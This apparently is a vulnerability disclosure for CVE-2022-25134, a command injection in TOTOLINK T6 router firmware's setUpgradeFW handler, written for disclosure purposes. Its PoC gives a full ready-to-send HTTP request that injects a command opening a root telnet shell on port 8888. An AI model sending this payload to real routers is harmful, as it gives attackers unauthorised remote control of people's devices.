Headline
CVE-2022-25134: my_vuln/13.md at main · pjqwudi1/my_vuln
A command injection vulnerability in the function setUpgradeFW of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.
TOTOLINK Vulnerability
Vendor:TOTOLINK
Product:T6
Version:T6 V3_Firmware(T6_V3_V4.1.5cu.748_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In cstecgi.cgi binary:
In setUpgradeFW function,slaveIpList is directly passed by the attacker, so we can control the slaveIpList to attack the OS.
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
PoC
We set slaveIpList as telnetd -l /bin/sh -p 8888 , and the router will excute it,such as:
POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 135 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/advance/upload.html?time=1644737080301 Cookie: SESSION_ID=2:1644737054:2
{"slaveIpList":"`telnetd -l /bin/sh -p 8888`","resetFlags":"0","FileName":"hack.bin","ContentLength":4784128,"topicurl":"setUpgradeFW"}
Result
Get a shell!
